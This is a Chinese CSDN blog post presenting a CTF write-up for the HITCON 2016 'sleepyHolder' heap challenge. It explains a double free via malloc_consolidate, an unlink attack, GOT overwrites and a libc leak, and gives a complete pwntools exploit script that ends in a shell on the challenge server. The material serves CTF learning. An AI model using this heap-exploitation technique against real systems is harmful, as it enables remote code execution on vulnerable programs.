sleepyHolder_hitcon_2016(fastbin的检查机制+malloc_consolidate+double free)

最新推荐文章于 2024-05-15 14:58:56 发布
最新推荐文章于 2024-05-15 14:58:56 发布
阅读量1k 收藏 1
点赞数 2
分类专栏: pwn 二进制漏洞 CTF 文章标签: 安全 PWN CTF 二进制漏洞 缓冲区溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/105856878
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏

sleepyHolder_hitcon_2016

首先,检查一下程序的保护机制

然后,我们用IDA分析一下,delete功能没有清空指针,并且也没有校验,因此可以double free。

Edit功能又验证标志,因此不能UAF编辑

Add功能可以创建三种规格的堆。

由于没有开启PIE,并且堆指针存储在bss上,因此unlink是比较好的方法。但是不能溢出,

而要想成功double free,仅一个fastbin的chunk不行。Fastbindouble free的检查机制是仅仅检查fastbin的头chunk是否与当前要释放的这个相同sizechunk地址一样。

因此,我们可以利用malloc_consolidate,来将fastbin的chunk从fastbin里卸下来,触发malloc_consolidate的条件是申请一个大的堆,功能里正好有这个功能。malloc_consolidate的功能就是把chunkfastbin取出,相邻的chunk进行合并,并且会设置下一个chunkprev_inuse位为0当chunk从fastbin里取出后,我们就可以在再一次free这个chunk了,此时,fastbin里没有形成循环链表,一个chunk在fastbin,一个chunk在unosrted bin。关键的一点是下一个chunk的prev_inuse已经清零,我们将fastbin里的那个chunk申请回来,伪造一个chunk,然后释放下一个unsorted bin范围的chunk,就会发生unlink。

Unlink以后,实现了任意地址读写,改写got表

#coding:utf8
from pwn import *
from LibcSearcher import *

#sh = process('./sleepyHolder_hitcon_2016')
sh = remote('node3.buuoj.cn',25929)
elf = ELF('./sleepyHolder_hitcon_2016')
free_got = elf.got['free']
puts_plt = elf.plt['puts']
atoi_got = elf.got['atoi']
small_buf_addr = 0x00000000006020D0

def add(type,content):
   sh.sendlineafter('3. Renew secret\n','1')
   sh.sendlineafter('What secret do you want to keep?',str(type))
   sh.sendafter('Tell me your secret:',content)

def delete(type):
   sh.sendlineafter('3. Renew secret\n','2')
   sh.sendlineafter('Which Secret do you want to wipe?',str(type))

def edit(type,content):
   sh.sendlineafter('3. Renew secret\n','3')
   sh.sendlineafter('Which Secret do you want to renew?',str(type))
   sh.sendafter('Tell me your secret:',content)

add(1,'a'*0x20)
add(2,'b'*0x20)
#1放入fastbin
delete(1)
#触发malloc_consolidate整理fastbin放入smallbin
add(3,'c'*0x20)
#由于fastbin的double free仅仅是比较fastbin头与当前free的chunk是否一样
#由于malloc_consolidate把fastbin里的chunk给取出来了,因此又可以free一次了
#并且chunk2的size的prev_inuse已经清零
#现在可以再一次free fastbin了
delete(1)
#伪造chunk1
payload = p64(0) + p64(0x21)
#fd、bk
payload += p64(small_buf_addr - 0x18) + p64(small_buf_addr - 0x10)
#prev_size
payload += p64(0x20)
add(1,payload)
#unlink
delete(2)
#修改big_buf、small_buf指针
payload = '\x00'*0x8 + p64(free_got) + p64(0) + p64(small_buf_addr - 0x10) + p64(1)
edit(1,payload)
#修改free的got表为puts的plt表
edit(2,p64(puts_plt))
#修改big_buf、small_buf指针
payload = p64(atoi_got) + p64(0) + p64(atoi_got) + p64(1) + p64(1)
edit(1,payload)
#泄露atoi地址
delete(1)
sh.recvuntil('2. Big secret\n')
atoi_addr = u64(sh.recvuntil('\n',drop = True).ljust(8,'\x00'))
libc = LibcSearcher('atoi',atoi_addr)
libc_base = atoi_addr - libc.dump('atoi')
system_addr = libc_base + libc.dump('system')
print 'libc_base=',hex(libc_base)
print 'system_addr=',hex(system_addr)
#修改atoi的got表为system
edit(2,p64(system_addr))
#getshell
sh.sendlineafter('3. Renew secret\n','sh\x00')

sh.interactive()

 

ha1vk
关注
专栏目录
Glibc:浅谈 malloc_consolidate() 函数具体实现
加号减减号的博客
02-22 1万+
简介 源代码 分析 0x00 - 堆未初始化则初始化 0x01 - 堆已初始化则清空 fastbin 总结 简介 malloc_consolidate() 函数是定义在 malloc.c 中的一个函数,用于将 fastbin 中的空闲 chunk 合并整理到 unsorted_bin 中以及进行初始化堆的工作,在 malloc() 以及 free() 中均有可能调用 m...
houseoforange_hitcon_2016
fayinq的博客
04-07 270
houseoforange_hitcon_2016检查保护 保护全开 FSOP:对于_IO_FILE_plus结构体的利用 首先,在分析这个题目之前,我们需要知道两个知识点,一个是_IO_FILE_plus,一个是FSOP _IO_FILE_PLUS _IO_FILE_plus是ptmalloc中定义的一种结构体,他决定了很多东西,先在gdb里面查看一眼 在此,我们就用本次题目中会使用到的_IO_list_all结构体来作为参考。 _IO_FILE_plus 主要是由两个部分组成,其中一个是_IO
(unlink) HITCON CTF 2016 : Sleepy Holder
qq_36918532的博客
01-20 340
今天仍然是复习unlink的原理和利用过程 这个跟Secret Holder类似的,只不过huge secret一旦创建就无法删除了和修改了(我之前写payload时候忘记了,还delete(3)。。。) 安全检查之后拖到IDA里面:菜单题 free功能好像没什么毛病 修改功能好像也没什么问题(难道问题在分配里面) 看到分配功能,也就是三个秘密分配,也没有什么分配函数读取越界溢出,或者off-by-null漏洞 然后大致只得到了,分配通过flag的位置是否为1,来判断的并且其相对的布局分别是 0x602
Hitcon 2016 SleepyHolder-fastbin_dup_consolidate
九层台
03-08 447
#include <stdio.h> #include <stdlib.h> #include <string.h> #include <signal.h> #include <fcntl.h> #include <sys/stat.h> #include <sys/types.h> #define BASE 4...
2016 HITCON CTF SleepyHolder
Bill
04-22 1739
2016 HITCON CTF SleepyHolder 序言 本来这周准备学习House_Of_Orange, 但是这个牵扯知识点太多. 忽然发现还有一个fastbin_dup_consolidate没有学习, 补一下. 程序运行(文章尾部有程序源码) 1. MENU 1. Keep secret 2. Wipe secret 3. Renew secret 2....
sleepyHolder_hitcon_2016
z1r0的博客
04-09 368
sleepyHolder_hitcon_2016 查看保护 一个简单题目 这里没有清掉 攻击思路:利用fastbin_dup_consolidate这个手法实现double free。然后利用unlink攻击,改got为system发送sh即可getshell。 创建1和2类型的堆块,此时释放1,1会进fastbin。接下来申请3类型的堆,因为特别大所以1会进smallbin,此时再次释放1,就可以形成double free,申请回来1个1类型,会发现2的标志位还是0,所以可以使用unlink攻击来ge
Hitcon 2016 SleepyHolder-fastbin_dup_consolidate.c
个人笔记
06-04 239
参考/题目下载:1,三联保护:基本都开了功能:0、唤醒功能;1、创建-secret:Big secret;2、清除-secret;3、修改-secret;2,IDA分析功能主函数:清除功能-free:这四个指针都是BSS段的地址。问题点:未检查free的指针是否为空;free后指针未至置为0;导致:可以double free而要想成功double free,仅一个fastbin的chunk不行。
houseoforange_hitcon_2016(House of orange, unsorted bin attack,FSOP)
weixin_44145820的博客
04-27 1585
目录题目分析漏洞利用Exp 题目分析 只有添加,显示,编辑三个功能,没有删除 添加函数,最多只能添加四次,每次添加会依次执行malloc(0x10),malloc(name_size),calloc(8) House结构体如下 在编辑函数中,可以进行堆溢出,因为House没有把name的size保存下来 编辑次数最多为3 漏洞利用 Exp ...
信息安全_数据安全_HITCON_Badge_2019_秘辛:MCU_ARM_Tru.pdf
08-22
【标题】"信息安全_数据安全_HITCON_Badge_2019_秘辛:MCU_ARM_Tru.pdf" 涉及的是2019年HITCON活动的安全挑战,重点在于利用ARM TrustZone技术在微控制器(MCU)上的应用,特别是与数据安全和信息安全建设相关的内容...
信息安全_数据安全_HITCON_GIRLS_成果分享與_CyberSec_week.pdf
08-22
HITCON GIRLS是一个以女性为主体的信息安全社区,致力于推广信息安全学习和提升科技行业的包容性。 【HITCON GIRLS】 HITCON GIRLS社区通过组织各种主题的读书会,鼓励女性成员深入学习信息安全知识和技术,促进...
BMZCTF hitcon_2017_ssrfme
qq_26243045的博客
11-26 633
考点:perl脚本open命令执行 打开题目显示如下代码 将GET请求到的数据保存在我们自定义的文件名当中。 给url参数传递/可以查看根目录下的内容 Perl的open函数执行会执行给open函数所传递的文件名参数中的系统命令,但是前提是这个文件名是需要存在的。 这道题因为文件名是可以控制的,所以就先生成一个以读取flag命令命名的文件 然后使用file协议去读取文件 访问即可获得flag ...
malloc_consolidate
最新发布
A13837377363的博客
05-15 348
此文章用于详细介绍malloc_consolidate。众所周知,fastbin一般是不能合并,但在malloc_consolidate中是个例外。
doug lea malloc源码剖析之:malloc_consolidate
vt.buxiu技术文集
12-08 1958
流行分配器dlmalloc剖析之:malloc_consolidate版权声明: 本文章由vt.buxiu发布在www.vtzone.org,版权归vtzone研究小组所有,转载请保持此声明!!! @@内容摘要:       consolidate_fastbin函数用于合并fastbin中的空闲内存块,是doug lea malloc(dlmalloc)重要的函数之一。本文以dlmalloc
glibc-2.23_malloc_consolidate_浅析
weixin_30872671的博客
03-26 389
转载于:https://www.cnblogs.com/shangye/p/6622562.html
漏洞挖掘中的malloc_consolidateFASTBIN_CONSOLIDATION_THRESHOLD
董哥的黑板报
07-29 4097
一、何为consolidate 我们知道大于0x80的chunk被释放之后就放到了unsortedbin上面去,但是unsortedbin是一个未分类的bin,上面的chunk也处于未分类的状态。但是这些chunk需要在特定的条件下被整理然后放入到smallbins或者largebins中 这个整理的过程被称为unsortedbin的“consolidate”,但是“consolidate”是...
fastbin关于chunk size检查问题&&花式泄露libc&&极限getshell&&huxiangbei_2019_namesyste
azraelxuemo的博客
04-10 2897
上图就是大家很熟悉的关于fastbin大小的一个检查 首先是里面一层 chunksize 以及外面一层 这是c源码 而对于汇编层面,由于运行的时候知道具体是32位还是64位,所以做了一定的优化 r15就是我们对应的chunk头地址,+8就是size的起始地址 但注意看,我们其实只是取了size的低8位 那么这里就是绕过的关键,网上很多地方其实讲的都不是很多 只要我们找到的size的地方低8位满足如下要求即可 000000yx y满足在2~8之间就好,x随意 同时size高八位也随意 因为可以看到我.
技巧篇:scanf触发malloc_consolidate进行unlink(chunk size限制得到极小的chunk)
qq_39948058的博客
08-27 1694
前言:之前刷过这样的题,由于时间原因忘的差不多了,这里捡起两道不相似类型的题进行了大佬的exp学习,这里就不重写exp了,很好理解。一个off-by-one 一个off-by-null off-by-one exp: from pwn import * def add(size, index, content): sh.sendlineafter('choice >> \n', '1') sh.sendlineafter('Size : ', str(size))
好好说话之Fastbin Attack(4):Arbitrary Alloc
hollk’s blog
01-13 2008
总体来说这个方法并不难,例题2017 0ctf babyheap也不难,如果有仔细看过我的上一篇[2015 9447 CTF : Search Engine](https://blog.csdn.net/qq_41202237/article/details/111320740)的讲解,相信这个方法的例题对你来说只是流程更复杂一点,但是泄露libc啊、malloc_hook啊这种关键步骤还是一致的。流程部分我的方法是拿笔纸把每一步的chunk和bin写出来,这样更加集中注意力,哪里存在变化,都可以很快的发现
[hitcon 2017]ssrfme 1
04-11
这道题目是一个SSRF漏洞题目。SSRF全称为Server Side Request Forgery,是一种常见的Web安全漏洞。当存在SSRF漏洞时,攻击者可以将服务器作为代理,进而访问在内部网络中无法访问的资源,如内部Web应用、数据库等。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值